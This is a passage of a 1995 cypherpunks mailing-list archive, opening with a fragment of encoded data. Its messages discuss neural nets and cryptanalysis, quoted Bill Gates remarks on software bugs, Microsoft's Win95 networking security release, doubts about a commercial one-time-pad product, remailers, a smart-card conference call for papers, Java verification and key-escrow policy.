M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 11 Nov 1995 07:54:53 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
Message-ID: <199511102323.SAA06186@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Bruce Schneier comments:

   Neural Networks

   Neural nets aren't terribly useful for cryptanalysis,
   primarily because of the shape of the solution space.
   Neural nets work best with problems that have a continuity
   of solutions, some better than others. This allows a neural
   net to learn, proposing better and better solutions as it
   does. Breaking an algorithm provides for very little in the
   way of learning opportunities: You either recover the key
   or you don't. (At least this is true if the algorithm is
   any good.) Neural nets work well in structured environments
   where there is something to learn, but not in the
   high-entropy, seemingly random world of cryptography.

   "Applied Cryptography," second edition, 1996, p. 155.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Fri, 10 Nov 1995 17:06:09 +0800
To: cypherpunks@toad.com
Subject: NOISE: Bill Gates view of SW Bugs and new releases - some quotes
Message-ID: <199511100853.AA35016@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


Here is some signature fodder.

>FOCUS - is a German magazine
>
>
>FOCUS: Every new release of a software which has less bugs than the older
>       one is also more complex and has more features...
>Gates: No, only if that is what'll sell!
>
>FOCUS: But...
>Gates: Only if that is what'll sell! We've never done a piece of software
>       unless we thought it would sell. That's why everything we do in 
>       software ... it's really amazing: We do it because we think that's 
>       what customers want. That's why we do what we do.
>
>FOCUS: But on the other hand - you would say: Okay, folks, if you don't
>       like these new features, stay with the old version, and keep the bugs?
>Gates: No! We have lots and lots of competitors. The new version - it's not
>       there to fix bugs. That's not the reason we come up with a new version.
>
>FOCUS: But there are bugs an any version which people would really like to
>       have fixed.
>Gates: No! There are no significant bugs in our released software that any
>       significant number of users want fixed.
>
>FOCUS: Oh, my God. I always get mad at my computer if MS Word swallows the
>       page numbers of a document which I printed a couple of times with page
>       numbers. If I complain to anybody they say "Well, upgrade from 
>       version 5.11 to 6.0".
>Gates: No! If you really think there's a bug you should report a bug. Maybe
>       that you're not using it properly. Have you ever considered that?
>
>FOCUS: Yeah, I did...
>Gates: It turns out Luddites don't know how to use software properly, so
>       you should look into that. - The reason we come up with new versions 
>       is not to fix bugs. It's absolutely not. It's the stupidest reason to 
>       buy a new version I ever heard. When we do a new version we put in lots
>       of new things that people are asking for. And so, in no sense, is 
>       stability a reason to move to a new version. It's never a reason.
>
>FOCUS: How come I keep being told by computer vendors "Well, we know about
>       this bug, wait till the next version is there, it'll be fixed"? I hear 
>       this all the time. How come? If you're telling me there are no 
>       significant bugs in software and there is no reason to do a new version?
>Gates: No. I'm saying: We don't do a new version to fix bugs. We don't. Not
>      enough people would buy it. You can take a hundred people using Microsoft
>      Word. Call them up and say "Would you buy a new version because of bugs?"
>      You won't get a single person to say they'd buy a new version because of
>      bugs. We'd never be able to sell a release on that basis.
>
>FOCUS: Probably you have other contacts to your software developers. But if
>       Mister Anybody, like me, calls up a store or a support line and says, 
>       "Hey listen, there's a bug" ... 90 percent of the time I get the answer
>       "Oh, well, yeah, that's not too bad, wait to the next version and it'll
>       be fixed". That's how the system works.
>
>Gates: Guess how much we spend on phone calls every year.
>FOCUS: Hm, a couple of million dollars?
>
>Gates: 500 million dollars a year. We take every one of these phone calls
>       and classify them. That's the input we use to do the next version. 
>       So it's like the worlds biggest feedback loop. People call in - we 
>       decide what to do on it. Do you want to know what percentage of those 
>       phonecalls relates to bugs in the software? Less than one percent.
>
>FOCUS: So people call in to say "Hey listen, I would love to have this and
>       that feature"?
>Gates: Actually, that's about five percent. Most of them call to get advice
>      on how to do a certain thing with the software. That's the primary thing.
>      We could have you sit and listen to these phone calls. There are millions
>      and millions of them. It really isn't statistically significant. Sit in
>      and listen to Win 95 calls, sit in and listen to Word calls, and wait, 
>      just wait for weeks and weeks for someone to call in and say "Oh, I 
>      found a bug in this thing".
>...
>
>FOCUS: So where does this comon feeling of frustration come from that
>       unites all the PC users? Everybody experiences it every day that these
>       things simply don't work like they should.
>Gates: Because it's cool. It's like, "Yeah, been there done that - oh,
>       yeah, I know that bug." - I can understand that phenomenon 
>       sociologically, not technically.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: llurch@Networking.Stanford.EDU (Richard Charles Graves)
Date: Mon, 13 Nov 1995 16:44:42 +0800
Subject: MS Corrects Press Release on "Samba" Security Problem
Message-ID: <4814sh$i3g@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


The Win95 product manager let me know yesterday that they'd corrected some
of the errors on their Web server. I'm sure Microsoft is planning to
publicize the changes in greater detail, so I'll just summarize them here. 

Load the original security bugfix news release at
gopher://quixote.stanford.edu/0R1271897-1279147-/win95netbugs side-by-side
with the corrected version now at
http://www.microsoft.com/windows/software/w95fpup.htm to see the changes. 
Notable corrections are:

1. Microsoft has retracted the puzzling allegation that SMBCLIENT sends
"illegal commands" across the network. 

2. Microsoft is now a bit more forthright in acknowledging that the 
problem applies to all language versions of Win95.

They didn't change the date, and they still say that Samba is shareware. 
And they still fail to give proper credit to the third parties that
actually found the problems for Microsoft. Oh well, can't have everything. 

Microsoft has also promised that localized (foreign-language) versions of
the "updated files that address the issue" will be made available within
two weeks. I still don't understand what the hold-up is, but a time frame 
is good.

In addition, Microsoft is reconsidering the position of the NE4100 and
certain NE2000- compatible PCMCIA cards like the EFA-207 on the hardware
compatibility list because, well, they aren't. 

Yusuf has given his imprimatur of Official Microsoft Response to the
discussion of the well-known IPX SAP routing and security issue saved at
gopher://quixote.stanford.edu/0R161799-178969-/win95netbugs. Previously
this had only been posted with the "speaking only for myself" disclaimer,.
Microsoft had acknowledged only the specific "server name conflict issue"
covered by PC Week, not the underlying general problem that has been
widely discussed on Usenet. Maybe we'll get a good article into the
Knowledge Base now. 

I'm still hoping they'll document the known and acknowledged ProviderPath 
problem with wsock32.dll.

Progress comes slowly.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: llurch@Networking.Stanford.EDU (Richard Charles Graves)
Date: Mon, 13 Nov 1995 20:37:05 +0800
To: Cypherpunks Lite <cp-lite@comsec.com>
Subject: MS Corrects Press Release on "Samba" Security Problem
Message-ID: <199511130517.VAA21401@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


The Win95 product manager let me know yesterday that they'd corrected some
of the errors on their Web server. I'm sure Microsoft is planning to
publicize the changes in greater detail, so I'll just summarize them here. 

Load the original security bugfix news release at
gopher://quixote.stanford.edu/0R1271897-1279147-/win95netbugs side-by-side
with the corrected version now at
http://www.microsoft.com/windows/software/w95fpup.htm to see the changes. 
Notable corrections are:

1. Microsoft has retracted the puzzling allegation that SMBCLIENT sends
"illegal commands" across the network. 

2. Microsoft is now a bit more forthright in acknowledging that the 
problem applies to all language versions of Win95.

They didn't change the date, and they still say that Samba is shareware. 
And they still fail to give proper credit to the third parties that
actually found the problems for Microsoft. Oh well, can't have everything. 

Microsoft has also promised that localized (foreign-language) versions of
the "updated files that address the issue" will be made available within
two weeks. I still don't understand what the hold-up is, but a time frame 
is good.

In addition, Microsoft is reconsidering the position of the NE4100 and
certain NE2000- compatible PCMCIA cards like the EFA-207 on the hardware
compatibility list because, well, they aren't. 

Yusuf has given his imprimatur of Official Microsoft Response to the
discussion of the well-known IPX SAP routing and security issue saved at
gopher://quixote.stanford.edu/0R161799-178969-/win95netbugs. Previously
this had only been posted with the "speaking only for myself" disclaimer,.
Microsoft had acknowledged only the specific "server name conflict issue"
covered by PC Week, not the underlying general problem that has been
widely discussed on Usenet. Maybe we'll get a good article into the
Knowledge Base now. 

I'm still hoping they'll document the known and acknowledged ProviderPath 
problem with wsock32.dll.

Progress comes slowly.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com
Date: Sat, 11 Nov 1995 11:58:25 +0800
To: cypherpunks@toad.com
Subject: POTP Security
Message-ID: <gate.RXLDeD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


>POTP(tm) Secure FTP version 1.5 for MS Windows
>===============================================
>
>The first commercially available implementation of our 
>POTP (Power One Time Pad) encryption algorithm. The package includes 
>a POTP Secure FTP Client, POTP Secure FTP Server, and POTP FileCrypt - 
>a stand alone file encryption program.
>
>Both our client and server support standard ftp, in addition to 
>absolutely user-transparent encryption on-the-fly of all data 
>sent/received when connected to a POTP Secure FTP Server/Client.

What level of security does this cute, little puppy provide???






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Tue, 14 Nov 1995 03:08:09 +0800
To: cypherpunks@toad.com
Subject: Current list of Remailers
Message-ID: <199511110131.TAA00538@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello Everyone,

	Since Raph annonced his new Type-II remailer list, I just
wanted to let everyone know that I have updated the type2.list and
pubring.mix files on jpunix.com to reflect the most up-to-date status
of the Type-II Mixmaster remailers, You can connect to
http://www.jpunix.com or ftp to ftp.jpunix.com to get the latest
configuration files.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 11 Nov 1995 09:47:12 +0800
To: bsdc@ai.mit.edu
Subject: CFP: CARDIS 1996
Message-ID: <v02120d00acc9aa51a6cc@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Found this in sci.crypt.research.

Notice the name at the top of the program committee...

Cheers,
Bob Hettinga


___________________________________________



                         First Call For Papers

                              CARDIS 1996

    SECOND SMART CARD RESEARCH AND ADVANCED APPLICATION CONFERENCE

            September 18-20, 1996, Amsterdam, The Netherlands

AIMS AND GOALS

Smart cards or IC cards offer a huge potential for information
processing purposes. The portability and processing power of IC cards
allow for highly secure conditional access and reliable distributed
information systems. IC cards are already available that can perform
highly sophisticated cryptographic computations. The applicability of
IC cards is currently limited mainly by our imagination; the
information processing power that can be gained by using IC cards
remains as yet mostly untapped and is not well understood. Here lies a
vast uncovered research area which we are only beginning to assess, and
which will have great impact on the eventual success of the technology.
The research challenges range from electrical engineering on the
hardware side to tailor-made cryptographic applications on the software
side, and their synergies.

Many currently existing events are mainly devoted to commercial and
application aspects of IC cards. In contrast, the CARDIS conferences
aim to bring together researchers who are active in all aspects of
design of IC cards and related devices and environment, such as to
stimulate synergy between different research communities and to offer a
platform for presenting the latest research advances. CARDIS 1994,
sponsored by the International Federation for Information Processing
(IFIP) and held in November 1994 in Lille, France, has successfully
brought together representatives from leading IC research centers from
all over the world. CARDIS 1996 will be the second occasion for the IC
card community in this permanent activity. CARDIS 1996 will be
organised jointly by the Centre for Mathematics and Computer Science at
Amsterdam (CWI) and the Department of Computer Systems of the
University of Amsterdam (UvA).


SUBMISSIONS

Submissions will be judged on relevance, originality, significance,
correctness, and clarity. Each paper should explain its contribution in
both general and technical terms, identifying what has been
accomplished, saying why it is significant, and comparing it with
previous work. Authors should make every effort to make the technical
content of their papers understandable to a broad audience. Papers
should be written in English.

Authors should submit:

* 16 copies
* of a full paper
* typeset using the Springer LNCS format (see instructions below)
* not exceeding 20 pages in length
* printed double-sided if possible
* addressed to

  Pieter H. Hartel
  Univ. of Amsterdam
  Dept. of Computer Systems
  Kruislaan 403
  1098 SJ Amsterdam
  The Netherlands

In addition, each submission should be accompanied by information
submitted via WWW, (http://www.cwi.nl/~brands/cardis/submit.html) or
submitted via email to cardis@fwi.uva.nl that consists of:

* a single postal address and electronic mail address for
  communication
* complete title, author and affiliation information
* the abstract of the paper
* a small selection of the keywords that appear on this call for
  papers, which best describe the contribution of the paper

Proceedings will be available at the conference. It is intended to
publish the proceedings in the Springer LNCS series. Authors of
accepted papers may be expected to sign a copyright release form.


IMPORTANT DATES

  Submission deadline           March 1, 1996
  Acceptance notification       May 15,  1996
  Camera ready paper due        July 1,  1996
  Conference                    September 18--20 1996

THEMES

    Technology/hardware
 1    IC architecture and techniques
 2    Memories and processor design
 3    Read/Write unit engineering
 4    Specific co-processors for cryptography
 5    Biometry
 6    Communication technologies
 7    Interfaces with the user, the service suppliers
 8    Reliability and fault tolerance
 9    Special devices
10    Standards
    Software
11    The operating system
12    Models of data management
13    Communication protocols
    IC Card design
14    Tools for internal or external software production
15    Validation and verification
16    Methodology for application design
    Electronic payment systems
17    Road pricing
18    Internet payment systems
19    Untraceability
    Algorithms
20    Formal specification and validation
21    Identification
22    Authentication
23    Cryptographic protocols for IC cards
24    Complexity
    Security
25    Models and schemes of security
26    Security interfaces
27    Hardware and software implementation
28    Security of information systems including cards
29    Formal verification of transaction sets
30    Protocol verification
    IC Cards, individuals and the society
31    IC cards and privacy
32    Owner access of data
33    IC cards: political and economical aspects
34    Is the IC card going to change legislation?
35    Patents, copyrights
    Future of ic cards
36    Innovative technologies
37    Moving towards the pocket intelligence
38    Convergence with portable PCs, lap tops etc ...
39    PCMCIA
    Innovative applications
40    Design methodology of applications
41    IC cards and the information system
42    Examples of new applications
43    Requirements for innovative cards
    Standards
44    Emerging standards
45    Compliance and approval


ORGANISATION

Steering committee chairman:

  Vincent Cordonnier (Rd2p, Lille)

Local organisation:

  Pieter Hartel (Southampton, UK and UvA, The Netherlands)
  Stefan Brands (CWI, The Netherlands)
  Eduard de Jong (QC consultancy, The Netherlands)

General Chairman:

  Pieter Hartel (Southampton, UK and UvA, The Netherlands)

Program Chairmen:

  Pierre Paradinas (Rd2p, Lille)
  Jean-Jacques Quisquater  (Louvain-la-Neuve, Belgium)

Program committee

  Stefan Brands (CWI, Amsterdam)
  Andr\'e Gamache (Qu\'ebec, Canada)
  Louis Guillou (CCETT, France)
  Josep Domingo Ferrer (Tarragon, Spain)
  Pieter Hartel (Southampton, UK and UvA, The Netherlands)
  Hans-Joachim Knobloch (Karlsruhe, Germany)
  Pierre Paradinas (Rd2p, France)
  Reinhard Posch (Graz, Austria)
  Jean-Jacques Quisquater  (Louvain-la-Neuve, Belgium)
  Matt Robshaw (RSA, inc, USA)
  Bruno Struif (GMD, Germany)
  Doug Tygar (Carnegie-Mellon, USA)


LECTURE NOTES IN COMPUTER SCIENCE

Advice to Authors for the Preparation of Camera-Ready Contributions to
LNCS/LNAI Proceedings

The preparation of manuscripts which are to be reproduced by
photo-offset requires special care. Manuscripts which are submitted in
technically unsuitable form will be returned for retyping or cancelled
if the volume otherwise cannot be finished on time. In order to make
the volume look as uniform as possible the following instructions
should be followed closely.

************

* PRINTING AREA:
Using 10-point font size for the main text the printing area should be
12.2 x 19.3 cm. Manuscripts prepared in this preferred format are
reproduced in the same size in the book. With these settings, the
interline distance should be arranged in such a way that some 42 to 45
lines occur on a full-text page.

* TYPEFACE and SIZE:
We recommend the use of Times or one of the similar typefaces widely
used in phototypesetting. (In Times and similar typefaces the letters
have serifs, i.e., short endstrokes at the head and the foot of
letters.) Please do not use a sans-serif typeface for running text,
except for computer programs.

The text should always be justified to occupy the full line width, so
that the right margin is not ragged. For normal text please use
10-point type size and one-line spacing. Small print (abstract and
affiliation) should be set in 9-point type size. Please use italic
print to emphasize words in running text; bold type in running text
and underlining should be avoided.

Headings should be capitalized (i.e., nouns, verbs and all other words
with at least five letters should have a capital initial) and should,
with the exception of the title, be aligned to the left. The font
sizes are as follows:

************

Heading level      Example Font          size and style

Title (centered)     Type Theory           14 point, bold
1st-level heading    1 Introduction        12 point, bold
2nd-level heading  2.1 Simple Connections  10 point, bold
3rd-level heading    Typing Rules.         10 point, bold
4th-level heading  Remarks: (text follows) 10 point,italic

************

* FIGURES:
If possible, originals should be pasted into the manuscript and
centered between the margins; if no originals of the required size are
available, figures may be reduced in scale and pasted into the text.
For halftone figures (photos), please forward high-contrast glossy
prints and mark the space in the text as well as the back of the
photographs clearly, so that there can be no doubt about where or
which way up they should be placed. The lettering of figures should be
in 10-point font size. Figures should be numbered. The legends also
should be centered between the margins and be written in 9-point font
size as follows:

(bold) Fig. 3. (text follows)

* PAGE NUMBERING:
Your paper should show no printed page numbers; they are decided by
the volume editor and finally inserted by the printer. Please indicate
the ordering of your pages by numbering the sheets (using a light
blue/green pencil) at the bottom of the reverse side. There also
should be no running heads.

* PRINTING QUALITY:
For reproduction we need sheets which are printed on one side only.
Please use a high-resolution printer, preferably a laser printer with
at least 300 dpi or higher resolution if possible. It is desirable
that on all pages the text appears in the middle of the sheets.

* REMARK 1:
If your typesetting system does not offer the variety of font sizes
needed for the preparation of your manuscript according to these
instructions, you may choose a different (larger) font size and a
correspondingly scaled printing area (12-point font size for the
running text, for example, corresponds to a printing area of 15.3 x
24.2 cm and to a final reduction rate of 80%).

* REMARK 2:
You are encouraged to use LaTeX or TeX for the preparation of you
camera-ready manuscript together with the corresponding Springer style
files "llncs" (for LaTeX) or "plncs" (for TeX) to be obtained by
e-mail or by ftp/gopher as follows:

Mailserver: Send an e-mail message to
   svserv@vax.ntp.springer.de  containing the line
   get /tex/latex/llncs.zip  for the LaTeX syle files or
   get /tex/plain/plncs.zip  for the TeX style files.
Sending "help" to the server prompts advice on how to interact with
the mail server. The style files have to be unzipped and uu-decoded
for use. In case of problems in getting or uu-decoding the style files
please contact "springer vax.ntp.springer.de".

Ftp: The internet address is "trick.ntp.springer.de", the user id
"ftp" or "anonymous". Please enter your e-mail address as password.
The (above mentioned) files reside in "/pub/tex/latex/llncs".

Gopher: Point your client to "trick.ntp.springer.de".


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an237621@anon.penet.fi
Date: Sat, 11 Nov 1995 04:59:04 +0800
To: cypherpunks@toad.com
Subject: Re: Yvette
In-Reply-To: <199511101816.LAA02444@nagina.cs.colorado.edu>
Message-ID: <199511101201.MAA00215@gears.efn.org>
MIME-Version: 1.0
Content-Type: text/plain



:
: tony266@vabeach.email.net allegedly wrote:
:
: I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
: is...
:
Yes, there is a cow on the lawn.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 11 Nov 1995 11:52:46 +0800
To: "James M. Cobb" <cypherpunks@toad.com
Subject: Re: New World Encryption
Message-ID: <acc9550f0102100474a5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:49 AM 11/11/95, James M. Cobb wrote:
>
>
>Friend,
>
>
>An item in 11 09 95 Edupage summarizes a NY Times new-
>sstory revealing Clinton's wish to spy on the world:
>
>OPPOSITION TO ADMINISTRATION'S ENCRYPTION STAND


"Friend,"

I'm sure your intentions are good in forwarding this and other similar
items to the Cypherpunks mailing list, but if you are reading the list, you
should surely know that this item--including both summaries and the
complete article--have already been posted to the Cypherpunks list. Two
days ago, in fact.

If for some reason you are _not_ reading the CP list, or not paying
attention, then you really should not be forwarding stuff to it.

I'm copying the CP list on this to remind folks to "stay on the page" as to
what's already been posted. We are already becoming a kind of "automatic
cc:" for a variety of announcements, spams, and other earthshattering
items.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 13 Nov 1995 17:29:45 +0800
To: cypherpunks@toad.com
Subject: Re: Java insecurity - long - argumentative - you are warned.
Message-ID: <199511110538.VAA18697@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995, Dietrich J. Kappe wrote:

> >>> While all this checking appears excruciatingly detailed, by the time
> >>> the byte code verifier has done its work, the Java interpreter can
> >>> proceed knowing that the code will run securely. Knowing these
> >>> properties makes the Java interpreter much faster, because it doesn't
> >>> have to check anything.
> >
> >Yikes!!  I'll leave this for someone else to address.  This sounds to me
> >like a variation on virus scanning.  I think that there are far more
> >reputable virus experts than I who can comment and expand on *flaws* with
> >that approach.
> 
> This "checking," as any comp-sci undergrad will tell you, amounts to solving
> the halting problem for the java interpreter. While this is possible for a
> finite state automata like the java interpreter (made more difficult by the
> fact that it can use the "net" for additional state), it is not even
> remotely feasable.

OK, so by saying that it is not "even remotely feasable", you're saying 
that any comp-sci undergraduate will say that it can't be done?  

That is what "not even remotely feasable" means, doesn't it??  I mean, 
even if Marketing wants this problem solved, that won't be enough?

> If you can write a checker that works in a reasonable amount of time, I'll
> write a turing machine simulator that'll do something nasty if the input
> machine halts. Then we'll split the fame and fortune for solving the 5 state
> Busy Beaver problem. Deal?

I'm sorry, I only work for T-shirt and mug contests. <grin>  That fifteen 
minutes of fame thingy, just isn't my cup of tea.



> Dietrich Kappe | Red Planet    http://www.redweb.com
> Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
> 1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
> Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Tue, 14 Nov 1995 02:57:43 +0800
To: cypherpunks@toad.com
Subject: New World Encryption
Message-ID: <Pine.BSD.3.91.951110214435.24482E-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
An item in 11 09 95 Edupage summarizes a NY Times new- 
sstory revealing Clinton's wish to spy on the world: 
 
OPPOSITION TO ADMINISTRATION'S ENCRYPTION STAND 
 
A coalition of 37 major U.S. technology companies has re- 
jected the Clinton Administration's proposed standard for 
data encryption, saying that they found Administration of- 
ficials unwilling to compromise. 
 
The government wants an encryption plan that will allow it 
to gather intelligence overseas, through the use of a key 
                       ^^^^^^^^ 
escrow encryption system. 
 
The high-tech companies want an encryption standard that 
would ensure privacy for both domestic and overseas users. 
                         ^^^^              ^^^^^^^^ 
(New York Times 8 Nov 95 C3) 
 
Their opposition to the Administration's plan has been joined 
by 12 conservative organizations who call it anti-consumer, 
anti-marketplace, and anti-progress.  (New York Times9 Nov 
95 C3) 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  To subscribe to Edupage: send a message to: 
 
                  listproc@educom.unc.edu 
 
       and in the body of the message type: 
 
    subscribe edupage <your first name> <your last name> 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 13 Nov 1995 17:26:23 +0800
To: cypherpunks@toad.com
Subject: Re: POTP Security
Message-ID: <199511110657.WAA04599@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 19:30 11/10/95 -0500, jgrubs@left.webcasters.com wrote:
>>The first commercially available implementation of our 
>>POTP (Power One Time Pad) encryption algorithm. The package includes 
>>a POTP Secure FTP Client, POTP Secure FTP Server, and POTP FileCrypt - 
>>a stand alone file encryption program.
>What level of security does this cute, little puppy provide???

Since they advertize One Time Pad security, the first thing I want to know
is how they distribute their keys.  One Time Pads require a key as long as
the encyphered message.  A one-time-pad system without a convincing story
about key distribution is bullshit.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Tue, 14 Nov 1995 06:12:28 +0800
To: cypherpunks@toad.com
Subject: Re: New World Encryption
In-Reply-To: <acc9550f0102100474a5@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.951110231009.24482G-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
Someone writes: 
 
 We are already becoming a kind of "automatic cc:" for a 
 variety of announcements, spams, and other earthshatter- 
 ing items. 
 
 
Someone may wish to include among these the document "Wel- 
come to the cypherpunks mailing list!" 
 
If so, then before he discards it, here are some excerpts 
from that document: 
 
 ...cypherpunks deals with technical details but slants the 
 discussion toward their social implications. 
 
 ...the debates on this list are about how to best get crypto 
 out there. 
 
 Cypherpunks do not seek to prevent other people from speak- 
 ing about their experiences or their opinions.
 
 Cypherpunks hope that all people desiring privacy will learn 
 how best to defend it. 
 
 
Cordially, 
 
Jim 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Tue, 14 Nov 1995 04:38:46 +0800
To: cypherpunks@toad.com
Subject: Who needs time vaults anyway?
Message-ID: <199511110715.AAA21835@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I don't really understand the use for "can't be opened until
Christmas" tricks.  If you don't want anyone to see your info until
Christmas then just don't give them a copy until then!  If you want
to prove that you have it but not let them see it until later then
do timestamping of hashes, zero-knowledge proofs and so forth.


Can anyone explain what use this theoretical "time-sensitive" crypto
box would be good for?


Regards,

Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://www-ugrad.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMKRNe/WZSllhfG25AQGXxAP9HuZU4tJZ92c4keUHbpSNjWcwyYhTOOWA
Atz/Ej8y0Q6xAwRdr2ggqYc7tgWUGMjGZy0vIoET9W6ofkXXnyZzUIFACzXuS7IK
8xOV740ShvnX//5j8x1TMOJuykRNrs0+y8eZI8gDLQ5R1vEEbv7JkmsVVUgdZpau
WMR6cG/9qu4=
=v4q/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Tue, 14 Nov 1995 06:16:40 +0800
To: cypherpunks@toad.com
Subject: Re: POTP Security
In-Reply-To: <gate.RXLDeD1w165w@left.webcasters.com>
Message-ID: <Pine.BSD.3.91.951111001407.24482H-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
On 11 10 95 jgrubs@left.webcasters.com inquired about POTP 
security: 
 
 What level of security does this cute, little puppy provide??? 
 
 
One approach to answering that inquiry is an excerpt from: 
 
 Date: Sat, 21 OCT 95 10:58:51 -0500 
 From: Paul Jackman <jacktech@delphi.com>
 Newgroups: talk.politics.crypto
 Subject: Re: Elementrix One-Time Pad 

 
 ...mine [Jackman's background and experience] goes back to 1961 
 as Crypto Communications Control Command Center Supervisor for 
 the National Security Agency (NSA), and US Army Inteligence Se- 
 curity.  Even so, I do not consider myself expert in either the 
 technical sense or the historical sense.  But, I know enough not 
 to comment on algorithms that I don't have access to.
 
 The algorithm will be published when patent protection is assured.
 It is currently patent pending in several countries.
 
 As far as marketing goes, this product is not going to disapear.
 We have been premarketing security technology for four years through
 beta, and one year in pilot with international Fortune 100 companies.
 The initial presentations on Internet about a year ago showed us that
 the the newness and complexity of the Algorithm had to be presented
 one on on one to the experts which Elementrix has done.  There is a 
 long parade of companies that have implimented this technology but 
 do not wish to be named, (Typical of any security implementation. 
 Those who do aknowledge the integity of the products are noteworthy, 
 Allen Brill Kroll Assoc., Al Decker Coopers & Lybrand, Todd Sun Mer- 
 gent, and there will be many more.
 
 Paul Jackman
 
 
I silently corrected capitalization and spelling in the above ex- 
cerpt. 
 
I do not understand the import of the expression "expert in either 
the technical sense or the historical sense." 
 
 
Cordially, 
 
Jim 
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Atp3000@aol.com
Date: Mon, 13 Nov 1995 17:18:39 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
Message-ID: <951111003859_103654167@mail06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Thank's for your input.  Thus, it does make a lot sence after some
explanation.
Atp3000




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 14 Nov 1995 04:33:28 +0800
To: bryce@colorado.edu
Subject: Re: Who needs time vaults anyway?
In-Reply-To: <199511110715.AAA21835@nagina.cs.colorado.edu>
Message-ID: <199511110843.AAA18344@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Can anyone explain what use this theoretical "time-sensitive" crypto
> box would be good for?

	Suppose you die.

